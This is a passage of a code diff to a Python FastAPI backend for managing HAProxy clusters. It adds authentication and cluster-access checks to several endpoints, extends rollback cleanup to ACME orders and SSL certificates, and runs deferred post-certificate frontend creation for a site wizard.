# pointing at a non-existent cluster — Resume failed at the
# cluster Select (404) until the 30-day TTL pruned them.
# Drafts are user-scoped (no FK), so we have to scan the
# JSONB payload. The (payload->>'cluster_id') JSON path is
# text; cast to int and compare against the deleted cluster.
# Phase I: dual-filter — purge BOTH legacy
# `wizard_type='proxied_host'` and post-rebrand
# `wizard_type='site'` drafts that pointed at this
# now-deleted cluster, otherwise pre-rename drafts would
# linger as orphans until their 30-day TTL fires.
try:
deleted_drafts = await conn.execute(
"""
DELETE FROM wizard_drafts
WHERE wizard_type IN ('site', 'proxied_host')
AND (payload->>'cluster_id') ~ '^[0-9]+$'
AND ((payload->>'cluster_id')::int) = $1
""",
cluster_id,
)
if deleted_drafts and 'DELETE 0' not in str(deleted_drafts):
logger.info(
f"CLUSTER DELETE CASCADE: pruned wizard_drafts referencing "
f"cluster_id={cluster_id} ({deleted_drafts})"
)
except Exception as draft_e:
# Non-fatal — the cluster delete should still proceed
# even if the drafts table is missing or the JSONB path
# fails (very old DB schemas).
logger.warning(
f"CLUSTER DELETE CASCADE: failed to prune wizard_drafts "
f"for cluster_id={cluster_id}: {draft_e}"
)
# Delete cluster
await conn.execute("DELETE FROM haproxy_clusters WHERE id = $1", cluster_id)
@@ -4481,18 +4889,21 @@ async def reject_all_pending_changes(cluster_id: int, authorization: str = Heade
try:
from auth_middleware import get_current_user_from_token
current_user = await get_current_user_from_token(authorization)
conn = await get_database_connection()
# Check if cluster exists
cluster = await conn.fetchrow("SELECT id, name FROM haproxy_clusters WHERE id = $1", cluster_id)
if not cluster:
await close_database_connection(conn)
raise HTTPException(status_code=404, detail=f"Cluster {cluster_id} not found")
# Bulgu #79 — validate cluster access (admins bypass).
await validate_user_cluster_access(current_user['id'], cluster_id, conn)
# Get all pending config versions for this cluster (CRITICAL: Include metadata for rollback!)
pending_versions = await conn.fetch("""
SELECT id, version_name, metadata FROM config_versions
SELECT id, version_name, metadata FROM config_versions
WHERE cluster_id = $1 AND status = 'PENDING'
""", cluster_id)
@@ -4653,9 +5064,31 @@ async def reject_all_pending_changes(cluster_id: int, authorization: str = Heade
# Check for bulk snapshots (bulk import, restore)
bulk_snapshots = metadata.get('bulk_snapshots', [])
if bulk_snapshots:
# Bulk entity rollback
logger.info(f"REJECT ROLLBACK: Processing bulk snapshot with {len(bulk_snapshots)} entities")
for snapshot_wrapper in bulk_snapshots:
# R18c audit fix (round 1 #6): walk bulk snapshots
# in REVERSE creation order. The wizard appends in
# the order backend → servers → ssl_certificate
# → HTTP frontend → HTTPS frontend (which
# references the cert via `ssl_certificate_id` /
# `ssl_certificate_ids`). Pre-fix the rollback
# walked forward and tried to DELETE the cert
# BEFORE the frontend that referenced it. With
# deployments that have an FK on
# `frontends.ssl_certificate_id` (added in
# ensure_frontends_ssl_columns over time), the
# cert delete fired a FK violation and the
# rollback aborted, leaving the wizard's HTTPS
# frontend stranded as a CREATE without a
# rollback peer. Reversing the iteration restores
# the natural delete order (children before
# parents) so a strict FK schema rolls back
# cleanly. For deployments without the FK the
# change is a behaviour-preserving no-op.
snapshot_iter = list(reversed(bulk_snapshots))
logger.info(
f"REJECT ROLLBACK: Processing bulk snapshot with "
f"{len(bulk_snapshots)} entities (reverse-order)"
)
for snapshot_wrapper in snapshot_iter:
entity_snap = snapshot_wrapper.get('entity_snapshot')
if entity_snap:
# SSL entity rollback in bulk: Always rollback (Auto-Reject handles cross-cluster)
@@ -4712,13 +5145,33 @@ async def reject_all_pending_changes(cluster_id: int, authorization: str = Heade
be_ids = []
srv_ids = []
ssl_ids = []
bulk_import_entity_ids = {"frontends": [], "backends": [], "servers": []}
bulk_import_entity_ids = {
"frontends": [],
"backends": [],
"servers": [],
"letsencrypt_orders": [],
# R18 audit fix: wizard upload-mode hosts create a NEW
# ssl_certificates row and add a snapshot for it. Pre-R18
# this list omitted ssl_certificate, so reject left an
# orphan SSL row + PEM material on disk while the
# frontend/backend got cleaned up. Symmetrical handling
# is required for atomic wizard rollback.
"ssl_certificates": [],
}
import re
for v in pending_versions:
# CRITICAL FIX: Detect bulk import versions (bulk-import-*, restore-*)
# v1.5.0: also covers wizard-created versions:
# * bulk-site-create-* — current naming (post-rename)
# * bulk-proxied-host-create-* — legacy naming (pre-rename),
# kept so historical APPLIED
# versions still reject cleanly
# M4/L11.
is_bulk_version = (
v['version_name'].startswith('bulk-import-') or
v['version_name'].startswith('restore-')
v['version_name'].startswith('bulk-import-') or
v['version_name'].startswith('restore-') or
v['version_name'].startswith('bulk-site-create-') or
v['version_name'].startswith('bulk-proxied-host-create-')
)
if is_bulk_version:
@@ -4746,6 +5199,20 @@ async def reject_all_pending_changes(cluster_id: int, authorization: str = Heade
bulk_import_entity_ids["backends"].append(entity_id)
elif entity_type == "server":
bulk_import_entity_ids["servers"].append(entity_id)
elif entity_type == "letsencrypt_order":
# v1.5.0: wizard's staged ACME order for the new
# site. Reject path must clean it up so the user
# is not left with a dangling wizard_staged
# order pointing at a frontend that no longer
# exists. (R43/M27)
bulk_import_entity_ids["letsencrypt_orders"].append(entity_id)
elif entity_type == "ssl_certificate":
# R18 audit fix: track for force-delete
# parity with frontends/backends/servers.
# Without this the wizard's upload-mode
# cert row is left orphaned after a
# rejected wizard PENDING version.
bulk_import_entity_ids["ssl_certificates"].append(entity_id)
else:
# Normal entity-specific version (frontend-5-update, backend-3-create, etc.)
m1 = re.search(r'^frontend-(\d+)-', v['version_name'])
@@ -4823,7 +5290,13 @@ async def reject_all_pending_changes(cluster_id: int, authorization: str = Heade
rejected_count += total_auto_rejected
# CRITICAL FIX: Verify bulk import entities were properly rolled back (deleted)
if bulk_import_entity_ids["frontends"] or bulk_import_entity_ids["backends"] or bulk_import_entity_ids["servers"]:
if (
bulk_import_entity_ids["frontends"]
or bulk_import_entity_ids["backends"]
or bulk_import_entity_ids["servers"]
or bulk_import_entity_ids["letsencrypt_orders"]
or bulk_import_entity_ids["ssl_certificates"]
):
# Check if bulk import entities still exist (rollback failed)
remaining_fe = await conn.fetchval("""
SELECT COUNT(*) FROM frontends
@@ -4839,15 +5312,38 @@ async def reject_all_pending_changes(cluster_id: int, authorization: str = Heade
SELECT COUNT(*) FROM backend_servers
WHERE id = ANY($1) AND cluster_id = $2
""", bulk_import_entity_ids["servers"], cluster_id) if bulk_import_entity_ids["servers"] else 0
total_remaining = remaining_fe + remaining_be + remaining_srv
# v1.5.0 wizard staged ACME orders are NOT cluster-scoped via cluster_id
# column (cluster_ids JSONB). Their pre_apply_snapshot does the
# rollback only via metadata. So we treat any matching id-by-id
# row that still exists as "remaining" and force delete.
remaining_acme = await conn.fetchval("""
SELECT COUNT(*) FROM letsencrypt_orders
WHERE id = ANY($1)
""", bulk_import_entity_ids["letsencrypt_orders"]) if bulk_import_entity_ids["letsencrypt_orders"] else 0
# R18 audit fix: ssl_certificates rows created by the
# wizard's upload-mode flow. These are global (not
# cluster-scoped via the cluster_id column directly —
# the join lives in ssl_certificate_clusters), so we
# match by id only.
remaining_ssl = await conn.fetchval("""
SELECT COUNT(*) FROM ssl_certificates
WHERE id = ANY($1)
""", bulk_import_entity_ids["ssl_certificates"]) if bulk_import_entity_ids["ssl_certificates"] else 0
total_remaining = (
remaining_fe + remaining_be + remaining_srv
+ remaining_acme + remaining_ssl
)
if total_remaining > 0:
# CRITICAL: Bulk import entities were NOT deleted by rollback!
# This is a data corruption - entities should have been deleted
logger.error(
f"REJECT ROLLBACK FAILED: {total_remaining} bulk import entities still exist "
f"(fe={remaining_fe}, be={remaining_be}, srv={remaining_srv}). "
f"(fe={remaining_fe}, be={remaining_be}, srv={remaining_srv}, "
f"acme={remaining_acme}). "
f"Expected 0 after rollback DELETE. This indicates rollback failure."
)
@@ -4873,9 +5369,42 @@ async def reject_all_pending_changes(cluster_id: int, authorization: str = Heade
WHERE id = ANY($1) AND cluster_id = $2
""", bulk_import_entity_ids["servers"], cluster_id)
logger.warning(f"REJECT CLEANUP: Force deleted {deleted_srv} orphan servers from failed bulk import")
# v1.5.0 (R43/M27): wizard-staged ACME orders. Cascade
# also removes acme_challenges (ON DELETE CASCADE).
if bulk_import_entity_ids["letsencrypt_orders"]:
deleted_acme = await conn.execute("""
DELETE FROM letsencrypt_orders
WHERE id = ANY($1)
""", bulk_import_entity_ids["letsencrypt_orders"])
logger.warning(
f"REJECT CLEANUP: Force deleted {deleted_acme} wizard-staged "
f"letsencrypt_orders from failed bulk import"
)
# R18 audit fix: wizard upload-mode ssl_certificates
# rows. ON DELETE CASCADE on ssl_certificate_clusters
# cleans the junction; auto_renew=FALSE was already
# applied above for safety.
if bulk_import_entity_ids["ssl_certificates"]:
deleted_ssl = await conn.execute("""
DELETE FROM ssl_certificates
WHERE id = ANY($1)
""", bulk_import_entity_ids["ssl_certificates"])
logger.warning(
f"REJECT CLEANUP: Force deleted {deleted_ssl} wizard "
f"ssl_certificates from failed bulk import"
)
else:
total_tracked = (
len(bulk_import_entity_ids["frontends"])
+ len(bulk_import_entity_ids["backends"])
+ len(bulk_import_entity_ids["servers"])
+ len(bulk_import_entity_ids["letsencrypt_orders"])
+ len(bulk_import_entity_ids["ssl_certificates"])
)
logger.info(
f"REJECT ROLLBACK SUCCESS: All {len(bulk_import_entity_ids['frontends']) + len(bulk_import_entity_ids['backends']) + len(bulk_import_entity_ids['servers'])} "
f"REJECT ROLLBACK SUCCESS: All {total_tracked} "
f"bulk import entities were properly deleted"
)
@@ -4901,7 +5430,10 @@ async def reject_all_pending_changes(cluster_id: int, authorization: str = Heade
# ADDITIONAL SAFETY: Check if we just rejected bulk import versions
# If yes, DO NOT run final cleanup (bulk entities should already be deleted)
has_bulk_versions = any(
v['version_name'].startswith('bulk-import-') or v['version_name'].startswith('restore-')
v['version_name'].startswith('bulk-import-')
or v['version_name'].startswith('restore-')
or v['version_name'].startswith('bulk-site-create-') # v1.5.0 (current naming)
or v['version_name'].startswith('bulk-proxied-host-create-') # v1.5.0 legacy
for v in pending_versions
)
+50 -6
View File
@@ -369,11 +369,28 @@ async def get_best_practices(
async def compare_configurations(
current_config: str,
new_config: str,
context_lines: int = 3
context_lines: int = 3,
authorization: str = Header(None),
):
"""Compare two HAProxy configurations and show differences"""
"""Compare two HAProxy configurations and show differences.
Bulgu #78 (round-22 audit) — pre-fix this endpoint accepted
unauthenticated POSTs with two arbitrary config blobs.
While the diff itself is stateless, exposing it without
authn:
* lets anyone burn CPU on an internal endpoint
* leaks the EXISTENCE of the diff endpoint to scanners
* permits drive-by use as a side-channel oracle if the
difflib output ever surfaces operator-specific data
(line numbers, comments, etc.)
Require a valid bearer token. Permission gating is
deliberately light — any authenticated viewer should still
be able to diff configs they're authorised to read.
"""
try:
from auth_middleware import get_current_user_from_token
await get_current_user_from_token(authorization)
import difflib
current_lines = current_config.splitlines(keepends=True)
@@ -735,7 +752,20 @@ async def parse_bulk_config(
cluster_id=request.cluster_id,
config_size=len(request.config_content)
)
# Bulgu #82 (round-22 audit) — pre-fix this endpoint had
# `config.write` permission but NO per-cluster access
# check. The downstream `SELECT ... FROM
# ssl_certificates WHERE ... cluster_id=$1` leaked
# certificate names and IDs from clusters the operator
# had no read access to, and the parse result was
# designed to feed `bulk_create_entities` (also un-
# scoped pre-fix, see same Bulgu) which then wrote
# into the target cluster.
if request.cluster_id and not is_super_admin:
from routers.backend import validate_user_cluster_access
await validate_user_cluster_access(current_user['id'], request.cluster_id, conn)
# Parse the configuration
parse_result = parse_haproxy_config(request.config_content)
@@ -1440,8 +1470,17 @@ async def bulk_create_entities(
frontends_count=len(request.frontends),
backends_count=len(request.backends)
)
conn = await get_database_connection()
# Bulgu #82 (round-22 audit) — see `parse_bulk_config`
# above. The write path was the more damaging side of
# the same hole: a `config.write`-bearing operator
# scoped to cluster 1 could bulk-import an entire
# parsed config into cluster 2.
if request.cluster_id and not is_super_admin:
from routers.backend import validate_user_cluster_access
await validate_user_cluster_access(current_user['id'], request.cluster_id, conn)
# BULK IMPORT MVP: Check for pending apply changes
# Prevent bulk import if there are unapplied changes (conflict prevention)
@@ -2191,7 +2230,12 @@ async def bulk_create_entities(
frontend_data.get("ssl_port"),
frontend_data.get("ssl_cert_path"),
frontend_data.get("ssl_cert"),
frontend_data.get("ssl_verify", "optional"),
# R18b audit fix: bulk-import default mirrors
# the model default. NULL == "omit verify
# directive". Pre-fix imported configs that
# lacked the field silently turned every HTTPS
# bind into `verify optional`.
frontend_data.get("ssl_verify"),
frontend_data.get("ssl_alpn"), # SSL advanced options
frontend_data.get("ssl_npn"),
frontend_data.get("ssl_ciphers"),
+28 -6
View File
@@ -263,12 +263,18 @@ async def submit_config_response(
Agent submits the haproxy.cfg content in response to a request.
"""
try:
# Validate agent API key
# Bulgu #75 (round-22 audit) — same auth-bypass fix as in
# `routers/agent.py`. Pre-fix the `if x_api_key and not
# agent_auth` short-circuited when no header was sent at
# all, letting an unauthenticated caller post arbitrary
# HAProxy-config content claiming to come from an agent.
agent_auth = await validate_agent_api_key(x_api_key)
if x_api_key and not agent_auth:
logger.warning(f"Invalid API key provided by agent '{agent_name}' for config response")
raise HTTPException(status_code=401, detail="Invalid API key")
if not agent_auth:
logger.warning(
f"Rejected config-response call for agent {agent_name!r}: "
f"missing or invalid x-api-key"
)
raise HTTPException(status_code=401, detail="Invalid or missing API key")
conn = await get_database_connection()
@@ -322,12 +328,28 @@ async def submit_config_response(
# ====== CLEANUP ENDPOINT ======
@router.delete("/cleanup-expired")
async def cleanup_expired_requests():
async def cleanup_expired_requests(authorization: str = Header(None)):
"""
Cleanup expired config requests and responses.
Called by scheduled job or manually.
Bulgu #78 (round-22 audit) — pre-fix this endpoint had NO
auth at all. Any unauthenticated caller could DROP rows
from `agent_config_requests` / `agent_config_responses`,
which directly drives the cluster's "what did the operator
ask the agent to fetch" history. Restrict to admin users —
legitimate callers are an internal scheduled job (which
can supply an admin bearer) or a human admin pressing
Maintenance → Cleanup in the UI.
"""
try:
from auth_middleware import get_current_user_from_token
current_user = await get_current_user_from_token(authorization)
if not current_user.get("is_admin", False):
raise HTTPException(
status_code=403,
detail="Only admin users can run cleanup-expired"
)
conn = await get_database_connection()
# Delete expired responses
+275 -7
View File
@@ -1,11 +1,13 @@
from fastapi import APIRouter, HTTPException, Request, Header
from typing import Optional
from typing import Any, List, Optional, Tuple
import logging
import re
import time
import hashlib
import json
from models import FrontendConfig
from models.frontend import _frontend_has_acl_contradiction
from database.connection import get_database_connection, close_database_connection
from utils.activity_log import log_user_activity
from services.haproxy_config import generate_haproxy_config_for_cluster
@@ -13,6 +15,205 @@ from services.haproxy_config import generate_haproxy_config_for_cluster
router = APIRouter(prefix="/api/frontends", tags=["frontends"])
logger = logging.getLogger(__name__)
# Bulgu #62 (round-22 audit) — handler-level enforcement of the
# `X !X` self-contradiction guard. Pre-fix this check lived inside
# the `FrontendConfig` Pydantic validators (Bulgu #13) and ran on
# EVERY operation — including UPDATE. Frontends created before the
# guard landed could carry stale contradictory rules (or were
# inserted via a pre-Bulgu-#13 wizard build). After the guard
# landed those frontends became unupdate-able from the
# FrontendManagement UI: the operator opened the Edit modal to
# change an unrelated field (port, max conn, default_backend), the
# UI re-sent the full rule list verbatim, the model validator hit
# the legacy `X !X` rule, and Save 400-ed with a contradiction
# error the operator had not authored.
#
# The handler-level helpers below restore the strict POST behaviour
# and let PUT GRANDFATHER rules that are unchanged from the existing
# DB row: new or modified contradictions still hard-reject (400),
# stale ones only emit a warning so the operator can fix at their
# own pace without being locked out of unrelated edits.
_NORMALISE_RULE_PREFIX_RE = re.compile(
r"^\s*(?:use_backend|redirect)\s+", re.IGNORECASE,
)
_NORMALISE_RULE_WS_RE = re.compile(r"\s+")
def _normalize_rule_string(s: str) -> str:
"""Bulgu #62 follow-up (round-22 hot-fix) — collapse whitespace
and strip the `use_backend ` / `redirect ` directive prefix so
a rule that round-trips through the FE's ACLRuleBuilder (which
parses the rule into a structured object and re-serialises
without the prefix) signs to the same value as the version
still sitting in the DB.
Without this normalisation the grandfathering check on UPDATE
silently fails: every PUT looks like a NEW rule even when the
operator hasn't touched the routing section. Mirrors the JS
`normalizeRuleString` helper in
`frontend/src/components/FrontendManagement.js`.
"""
if not isinstance(s, str):
return ""
stripped = _NORMALISE_RULE_PREFIX_RE.sub("", s, count=1)
return _NORMALISE_RULE_WS_RE.sub(" ", stripped).strip()
def _rule_to_signature(rule: Any) -> Optional[str]:
"""Reduce a redirect/use_backend/acl rule entry to a stable string
key used for grandfathered-vs-new comparison.
`acl_rules` and `use_backend_rules` are always strings. The
wizard's auto-generated HTTP→HTTPS redirect lives in
`redirect_rules` as a dict (`{type, scheme, code, condition,
...}`). For dicts we use `json.dumps(..., sort_keys=True)` so
semantically equal dicts collapse to the same key regardless of
Python's insertion-order.
Strings are normalised via `_normalize_rule_string` so a rule
that round-trips through the FE (where the ACLRuleBuilder
strips the `use_backend ` / `redirect ` prefix on serialise)
still matches the version stored in the DB.
"""
if isinstance(rule, str):
normalised = _normalize_rule_string(rule)
return f"str::{normalised}" if normalised else None
if isinstance(rule, dict):
try:
return "dict::" + json.dumps(rule, sort_keys=True, default=str)
except (TypeError, ValueError):
return None
return None
def _decode_db_rules_jsonb(raw) -> List[Any]:
"""JSONB column → Python list (handles str/list/None)."""
if not raw:
return []
if isinstance(raw, str):
try:
decoded = json.loads(raw)
except (json.JSONDecodeError, ValueError):
return []
else:
decoded = raw
return decoded if isinstance(decoded, list) else []
def _rule_contradiction_text(rule: Any) -> Optional[str]:
"""Return the string used to evaluate the `X !X` contradiction
for a given rule entry. Strings are checked directly; for
dict-shaped redirect rules the `condition` / `if` field is the
relevant text. Returns None for entries that have no
contradiction-relevant payload."""
if isinstance(rule, str):
return rule
if isinstance(rule, dict):
cond = rule.get("condition") or rule.get("if")
return cond if isinstance(cond, str) else None
return None
def _collect_routing_rule_contradictions(
rules: List[Any], origin_label: str,
) -> List[Tuple[str, Any]]:
"""Return `[(origin_label, offending_rule), ...]` for every entry
in `rules` whose contradiction text triggers
`_frontend_has_acl_contradiction`."""
out: List[Tuple[str, Any]] = []
for r in rules or []:
txt = _rule_contradiction_text(r)
if txt and _frontend_has_acl_contradiction(txt):
out.append((origin_label, r))
return out
def _format_contradiction_error(
conflicts: List[Tuple[str, Any]],
) -> str:
"""Build the human-facing 400 message listing every conflicting
rule. Used by both the POST handler (strict) and the PUT
handler (only for new/modified rules)."""
lines = [
"One or more routing / redirect rules contain the same "
"ACL in both positive AND negated form (e.g. "
"`if acl1 !acl1`). HAProxy accepts the syntax but "
"`X AND NOT X` is always false, so the rule never fires "
"and traffic silently falls through to `default_backend`. "
"Remove one of the two tokens before saving."
]
for label, rule in conflicts[:10]:
snippet = rule if isinstance(rule, str) else _rule_to_signature(rule)
if snippet and len(snippet) > 160:
snippet = snippet[:157] + "..."
lines.append(f" - {label}: {snippet}")
if len(conflicts) > 10:
lines.append(f" (+{len(conflicts) - 10} more)")
return "\n".join(lines)
def _enforce_routing_rule_contradictions(
frontend: FrontendConfig,
*,
grandfathered_signatures: Optional[set] = None,
) -> List[str]:
"""Walk `use_backend_rules` and `redirect_rules` on the payload,
collect any `X !X` self-contradictions, and:
* raise HTTPException(400) when the conflicting rule is NEW or
MODIFIED relative to `grandfathered_signatures` (or whenever
the caller passes `grandfathered_signatures=None`, meaning
strict mode for POST), OR
* return them as a list of warning strings when the rule
already existed verbatim in the DB row (UPDATE
grandfathering).
`grandfathered_signatures` is the union of `_rule_to_signature`
outputs for the existing DB row's `use_backend_rules` and
`redirect_rules` columns. Passing `None` means "treat every
contradiction as new" (POST / strict path).
"""
use_be = frontend.use_backend_rules or []
redirect = frontend.redirect_rules or []
conflicts = (
_collect_routing_rule_contradictions(use_be, "use_backend_rules")
+ _collect_routing_rule_contradictions(redirect, "redirect_rules")
)
if not conflicts:
return []
if grandfathered_signatures is None:
# POST / strict path — every contradiction blocks.
raise HTTPException(
status_code=400,
detail=_format_contradiction_error(conflicts),
)
# PUT / grandfathered path — split into NEW vs UNCHANGED.
blocking: List[Tuple[str, Any]] = []
warnings: List[str] = []
for label, rule in conflicts:
sig = _rule_to_signature(rule)
if sig and sig in grandfathered_signatures:
warnings.append(
f"Grandfathered {label} entry contains a "
f"self-contradictory `X !X` condition that pre-dated "
f"this validation. The rule never fires; fix it at "
f"your convenience. (rule: "
f"{rule if isinstance(rule, str) else sig[:160]})"
)
else:
blocking.append((label, rule))
if blocking:
raise HTTPException(
status_code=400,
detail=_format_contradiction_error(blocking),
)
return warnings
def filter_httpchk_from_options(options: Optional[str]) -> Optional[str]:
"""
Filter out 'option httpchk' directives from options field.
@@ -113,7 +314,11 @@ async def validate_user_cluster_access(user_id: int, cluster_id: int, conn):
return True
@router.get("", summary="Get All Frontends", response_description="List of frontend configurations")
async def get_frontends(cluster_id: Optional[int] = None, include_inactive: bool = False):
async def get_frontends(
cluster_id: Optional[int] = None,
include_inactive: bool = False,
authorization: str = Header(None),
):
"""
# Get All Frontends
@@ -154,6 +359,19 @@ async def get_frontends(cluster_id: Optional[int] = None, include_inactive: bool
- HTTP to HTTPS redirection
"""
try:
# R18c audit fix (round 6 #1 — KRITIK info leak): require
# an authenticated caller. Pre-fix the endpoint accepted
# anonymous GETs and returned the FULL listener layout
# (bind addresses, SSL cert IDs, ACL rules, redirect rules,
# use_backend rules) for every cluster. With wizard-created
# rows now in the table, any unauthenticated reader could
# enumerate the platform's complete frontend inventory.
# The frontend already attaches the JWT via axios defaults,
# so requiring auth is non-breaking; reverse-proxy
# deployments that previously relied on perimeter auth
# gain defense in depth.
from auth_middleware import get_current_user_from_token
await get_current_user_from_token(authorization)
conn = await get_database_connection()
if cluster_id:
@@ -342,7 +560,16 @@ async def get_frontends(cluster_id: Optional[int] = None, include_inactive: bool
"ssl_port": f.get("ssl_port"),
"ssl_cert_path": f.get("ssl_cert_path"),
"ssl_cert": f.get("ssl_cert"),
"ssl_verify": f.get("ssl_verify", "optional"),
# R18b audit fix: return ssl_verify verbatim (None
# stays None). Pre-fix this masked NULL → "optional",
# which the FrontendManagement edit form then sent
# back on save and SILENTLY persisted as "optional"
# — flipping operator intent ("verify clause omitted")
# to ("verify optional"). The HAProxy config
# generator already guards on a sentinel-empty
# value before appending the verify directive, so
# NULL → omitted is the correct round-trip.
"ssl_verify": f.get("ssl_verify"),
# CRITICAL FIX: Include SSL advanced options (bind SSL parameters)
"ssl_alpn": f.get("ssl_alpn"),
"ssl_npn": f.get("ssl_npn"),
@@ -405,7 +632,14 @@ async def create_frontend(frontend: FrontendConfig, request: Request, authorizat
)
conn = await get_database_connection()
# Bulgu #62 (round-22 audit) — strict X !X reject on CREATE.
# No existing row to grandfather against; every contradiction
# blocks. Mirrors the wizard's `_detect_acl_contradiction`
# gate (Bulgu #13) so both create paths reject the same
# shape.
_enforce_routing_rule_contradictions(frontend, grandfathered_signatures=None)
# Validate cluster access for multi-cluster security
if frontend.cluster_id:
await validate_user_cluster_access(current_user['id'], frontend.cluster_id, conn)
@@ -677,7 +911,33 @@ async def update_frontend(frontend_id: int, frontend: FrontendConfig, request: R
if not existing:
await close_database_connection(conn)
raise HTTPException(status_code=404, detail="Frontend not found")
# Bulgu #62 (round-22 audit) — UPDATE path: grandfather any
# `use_backend_rules` / `redirect_rules` entry that is
# IDENTICAL to what's already stored in the DB row. Only
# NEW or MODIFIED rules with `X !X` self-contradictions
# block the save. Stale entries (e.g. created by a pre-
# Bulgu-#13 wizard build, or by a direct API caller) emit
# a warning instead so the operator can change unrelated
# fields (port / max conn / default_backend) without first
# having to rewrite legacy routing rules.
grandfathered_signatures: set = set()
for r in _decode_db_rules_jsonb(existing["use_backend_rules"]):
sig = _rule_to_signature(r)
if sig:
grandfathered_signatures.add(sig)
for r in _decode_db_rules_jsonb(existing["redirect_rules"]):
sig = _rule_to_signature(r)
if sig:
grandfathered_signatures.add(sig)
contradiction_warnings = _enforce_routing_rule_contradictions(
frontend, grandfathered_signatures=grandfathered_signatures,
)
for w in contradiction_warnings:
logger.warning(
f"FRONTEND UPDATE id={frontend_id} name={frontend.name}: {w}"
)
# Validate cluster access for multi-cluster security
cluster_id = existing['cluster_id'] or frontend.cluster_id
if cluster_id:
@@ -950,10 +1210,18 @@ async def update_frontend(frontend_id: int, frontend: FrontendConfig, request: R
user_agent=request.headers.get('user-agent')
)
return {
response: dict = {
"message": f"Frontend '{frontend.name}' updated successfully",
"sync_results": sync_results
"sync_results": sync_results,
}
# Bulgu #62 (round-22 audit) — surface grandfathered
# contradiction warnings so the UI can render a non-blocking
# yellow toast on the next refresh. The save SUCCEEDED; the
# warnings only flag latent legacy data the operator may
# want to clean up at their convenience.
if contradiction_warnings:
response["warnings"] = contradiction_warnings
return response
except HTTPException:
raise
except Exception as e:
+478 -8
View File
@@ -61,10 +61,19 @@ class CertificateRequest(BaseModel):
@router.get("/accounts")
async def list_accounts(authorization: str = Header(None)):
"""v1.5.0 R12: list of LE accounts is now READ-ONLY for any
authenticated user. Account *creation* / deletion remains admin-only.
The wizard ('New Site' / ACME mode) needs this list so the
user can pick which LE account to bill against when more than one is
configured. Previously the wizard silently dropped the selector
because non-admin users got 403 here (Promise.allSettled swallowed
the failure).
"""
from auth_middleware import get_current_user_from_token
current_user = await get_current_user_from_token(authorization)
if not current_user.get('is_admin', False):
raise HTTPException(status_code=403, detail="Admin access required")
# Authentication still required — get_current_user_from_token raises
# 401 if the token is missing/invalid.
await get_current_user_from_token(authorization)
conn = await get_database_connection()
try:
rows = await conn.fetch(
@@ -705,11 +714,31 @@ async def _complete_certificate(order_id: int) -> dict:
except Exception as parse_err:
logger.warning(f"Could not parse ACME certificate metadata: {parse_err}")
existing_cert = await conn.fetchrow("""
SELECT id FROM ssl_certificates
WHERE primary_domain = $1 AND source = 'letsencrypt' AND is_active = TRUE
ORDER BY created_at DESC LIMIT 1
""", primary_domain)
# v1.5.0 (Bulgu #4 fix): a wizard-staged order ALWAYS expects a fresh
# cert + post-completion actions to fire. If `post_completion_actions`
# is non-empty we must NOT match against a manually-issued cert that
# happens to share the same primary_domain — that would silently
# swallow the HTTPS frontend creation and leave the wizard host
# broken.
pca_raw_for_match = order.get("post_completion_actions")
try:
_pca_check = (
json.loads(pca_raw_for_match)
if isinstance(pca_raw_for_match, str) and pca_raw_for_match.strip()
else (pca_raw_for_match or [])
)
except Exception:
_pca_check = []
is_wizard_order = bool(_pca_check)
if is_wizard_order:
existing_cert = None
else:
existing_cert = await conn.fetchrow("""
SELECT id FROM ssl_certificates
WHERE primary_domain = $1 AND source = 'letsencrypt' AND is_active = TRUE
ORDER BY created_at DESC LIMIT 1
""", primary_domain)
is_renewal = existing_cert is not None
@@ -825,6 +854,47 @@ async def _complete_certificate(order_id: int) -> dict:
if is_renewal and clusters_succeeded:
await _auto_apply_renewal(cert_id, clusters_succeeded)
# ====================================================================
# v1.5.0 Feature B (Issue #14): post_completion_actions JSONB support.
#
# The wizard staged this order with a deferred HTTPS-frontend create
# request. Now that the cert is downloaded we execute it.
#
# M2 guard: NEVER run on renewal — renewing a wizard-issued cert
# must not re-create the HTTPS frontend.
# M3 cancellation race: re-fetch the order's status before exec.
# M21/R35 collision re-check: re-validate bind_port collision.
# M24 conn reuse: pass our existing transaction conn into record_event.
# M26/R42 atomicity: wrap each action in its own conn.transaction().
# ====================================================================
post_completion_outcomes: list = []
if not is_renewal:
try:
pca_raw = order.get("post_completion_actions")
if isinstance(pca_raw, str) and pca_raw.strip():
pca = json.loads(pca_raw)
elif isinstance(pca_raw, list):
pca = pca_raw
else:
pca = []
except Exception:
pca = []
if pca:
# M3: re-check status to detect a cancellation race
fresh = await conn.fetchrow(
"SELECT status FROM letsencrypt_orders WHERE id = $1", order_id
)
if fresh and fresh["status"] == "valid":
post_completion_outcomes = await _execute_post_completion_actions(
conn, order_id, pca, cert_id
)
else:
logger.info(
f"[ACME] Skipping post_completion_actions for order {order_id}: "
f"status changed to {fresh and fresh['status']}"
)
msg = "Certificate renewed and applied" if is_renewal else "Certificate issued (pending Apply)"
if cluster_errors:
msg += f" ({len(cluster_errors)} cluster(s) failed: see cluster_errors)"
@@ -835,6 +905,7 @@ async def _complete_certificate(order_id: int) -> dict:
"auto_applied": is_renewal,
"clusters_succeeded": clusters_succeeded,
"cluster_errors": cluster_errors,
"post_completion_outcomes": post_completion_outcomes,
}
finally:
if lock_held:
@@ -845,6 +916,405 @@ async def _complete_certificate(order_id: int) -> dict:
await close_database_connection(conn)
async def _execute_post_completion_actions(
conn,
order_id: int,
actions: list,
cert_id: int,
) -> list:
"""v1.5.0 Feature B: execute the deferred actions stored on a wizard
ACME order's post_completion_actions JSONB.
Each action is independently wrapped in conn.transaction() (R42/M26),
has its own try/except (per-action errors do NOT block other actions),
and an executed_at idempotency flag.
Auto-apply is triggered if any executed action set _auto_apply=true on
its frontend_config.
"""
from utils.activity_log import record_event
from services.frontend_service import (
check_bind_port_collision,
create_frontend_row,
)
outcomes = []
auto_apply_user_ids: set = set()
auto_apply_cluster_ids: set = set()
for idx, action in enumerate(actions):
if not isinstance(action, dict):
outcomes.append({"index": idx, "status": "skipped", "reason": "not a dict"})
continue
if action.get("executed_at"):
outcomes.append({"index": idx, "status": "skipped", "reason": "already executed"})
continue
action_type = action.get("type")
try:
async with conn.transaction():
if action_type == "create_frontend":
fe_cfg = action.get("frontend_config") or {}
cluster_id = fe_cfg.get("cluster_id")
bind_address = fe_cfg.get("bind_address", "*")
bind_port = fe_cfg.get("bind_port", 443)
fe_name = fe_cfg.get("name") or f"fe-{order_id}-https"
if not cluster_id:
raise ValueError("frontend_config.cluster_id required")
# Bulgu #52 (round-18 audit) — verify the cluster still
# exists before any further work.
#
# `letsencrypt_orders.cluster_ids` is JSONB (not an FK),
# so an operator can delete a cluster between
